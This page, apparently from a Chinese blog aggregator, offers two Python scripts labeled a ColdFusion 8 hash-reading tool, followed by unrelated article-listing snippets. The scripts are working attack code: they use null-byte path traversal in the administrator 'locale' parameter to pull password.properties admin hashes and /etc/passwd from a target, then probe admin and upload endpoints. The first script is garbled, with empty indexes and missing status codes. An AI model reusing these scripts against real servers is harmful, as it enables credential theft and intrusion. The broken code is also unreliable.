Coldfusion8 读取HASH工具
#!/usr/bin/env python
#-*- coding:utf- -*-
import sys
import threading
import urllib
import httplib
class Mythread(threading.Thread):
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']
try:
for path in urls:
out = urllib.urlopen(self.host + path).read().split(r'</title>')[].split(r'<title>')[].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out
except Exception:
print "Error connect time"
self.scanner()
def scanner(self):
#self.host = host
cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
'/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
'/CFIDE/adminapi/_datasource/geturldefaults.cfm',
'/CFIDE/adminapi/_datasource/setdsn.cfm',
'/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
'/CFIDE/adminapi/_datasource/setsldatasource.cfm',
'/CFIDE/adminapi/customtags/l10n.cfm',
'/CFIDE/debug/cf_debugFr.cfm',
'/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm'] i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"} for fckpath in cfmfck:
if self.host[:] == "https://":
conn = httplib.HTTPSConnection(self.host.replace("https://",""))
else:
conn = httplib.HTTPConnection(self.host.replace("http://",""))
conn.request('GET',fckpath,headers = i_headers)
r1 = conn.getresponse() if r1.status == or r1.status == or r1.status == :
print self.host + fckpath + " " + str(r1.status) if __name__ == "__main__":
Mythread(sys.argv[]).start()
#!/usr/bin/env python
# -*- coding: utf8 -*-
import sys , urllib , httplib , subprocess
def banner():
print """
#--------------------------------------------------#
# Welcome to www.90sec.org #
# THis is read ColdFusion sha1 Tool #
# python COldFusion.py www.WebSite.cn #
#--------------------------------------------------#
"""
urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',
'/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en'] cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
try:
host = sys.argv[1]
if len(host) < '':
banner()
for url in urls:
context = urllib.urlopen(host + url).read()
out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')
print out except Exception:
banner()
sys.exit() else:
for line in cfmfck:
host = host.replace("http://","")
line = line.replace("\n","")
line = "/" + line
website = host + line
connection = httplib.HTTPConnection(host)
connection.request("GET",line)
response = connection.getresponse()
if response.status == 200:
print website , ''
elif response.status == 403:
print website , ''
elif response.status == 500:
print website , 'server ERROR'
Coldfusion8 读取HASH工具的更多相关文章
- Redis操作Hash工具类封装,Redis工具类封装
Redis操作Hash工具类封装,Redis工具类封装 >>>>>>>>>>>>>>>>>> ...
- Hash工具下载地址
因为经常要在非常用电脑使用,这里放一个链接,方便下载: http://files.cnblogs.com/files/cxun/Hash.zip HASH计算工具,可计算MD5.SHA-1.CRC32 ...
- POI读取excel工具类 返回实体bean集合(xls,xlsx通用)
本文举个简单的实例 读取上图的 excel文件到 List<User>集合 首先 导入POi 相关 jar包 在pom.xml 加入 <!-- poi --> <depe ...
- .NET Core 常用加密和Hash工具NETCore.Encrypt
前言 在日常开发过程中,不可避免的涉及到数据加密解密(Hash)操作,所以就有想法开发通用工具,NETCore.Encrypt就诞生了.目前NETCore.Encrypt只支持.NET Core ,工 ...
- poi读取excel工具类
package com.manage.utils; import ch.qos.logback.core.net.SyslogOutputStream; import com.google.gson. ...
- 读取配置文件工具demo
//读取配置文件public class ResourcesUtils { /* * @description:根据属性获取文件名 * * @param:propertyName文件的属性名 * * ...
- 【工具】读取proprtties工具类
获取properties内容: 基本的使用看网络上大多是这样的,使用时注意线程安全以及读写的实时性问题. 1.直接通过流读取(反射): InputStream inStream = this.get ...
- meterpreter读取hash明文记录
今天测试某个站点时读hash老出错 这里做下读hash的笔记 进去meterpreter后getuid一 1 2 meterpreter > getuid Server username: NT ...
- PropertiesUtil 读取配置文件工具类
package org.konghao.basic.util; import java.io.FileInputStream; import java.io.FileNotFoundException ...
随机推荐
- 【BZOJ2212】[Poi2011]Tree Rotations 线段树合并
[BZOJ2212][Poi2011]Tree Rotations Description Byteasar the gardener is growing a rare tree called Ro ...
- PHP错误处理,无法显示验证码。。无法显示首页等莫名其妙的500
use the date.timezone setting or the date_default_timezone_set() 这是由于调用date时,若timezone设置不正确所产生的E_NOT ...
- [NSUserDefaults]的使用:登陆后不再显示登录界面。
简介: NSUserDefaults是IOS应用用来存储用户偏好和配置信息的途径,就像是一个数据库,但是它通过键值对(key-value)的方式存储. 比如["Thematrix" ...
- Spring MVC http请求地址映射(三)
Spring MVC框架通过扫描将带有@Controller的类中的@RequestMapping的方法进行映射,然后调用映射的方法处理请求,这个分发过程默认是由DispaterServlet处理的. ...
- SpringMVC 之数据转换和国际化
1. 数据绑定流程 SpringMVC 主框架将 ServletRequest 对象及目标方法的入参实例传递给 WebDataBinderFactory 实例,以创建 DataBinder 实例对象; ...
- django_forms组件用ajax发送数据验证注册
forms组件 -forms是什么? 就是一个类,可以校验字段(前台传过来的字段) -怎么用: -校验字段功能: -先写一个类,继承Form from django.shortcuts import ...
- window下安装mysql详细步骤
1.下载安装包 打开mysql官网下载页面:http://dev.mysql.com/downloads/mysql/ 1.选择相应的版本和平台 2.mysql配置 打开刚刚解压的文件夹F:\mysq ...
- java生成jar包
Java编写的application程序是否可以终于形成一个类似于exe一样的可执行文件.难道就仅仅能用命令行执行? 通常有两种.一种是制作一个可运行的JAR文件包.然后就能够像.chm文档一样双击运 ...
- servlet中获取各种相对地址(服务器、服务器所在本地磁盘、src等)。
[本文简介] 本文将提供javaWeb中经常使用到的相对路径的获取方法,分别有: url基本地址 带目录的url地址 服务器的根路径 服务器所在的 本地磁盘路径 服务器所在的本地磁盘路径,带文件夹 S ...
- 如何使用django中的cookie和session?
1.Cookie 介绍 Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Co ...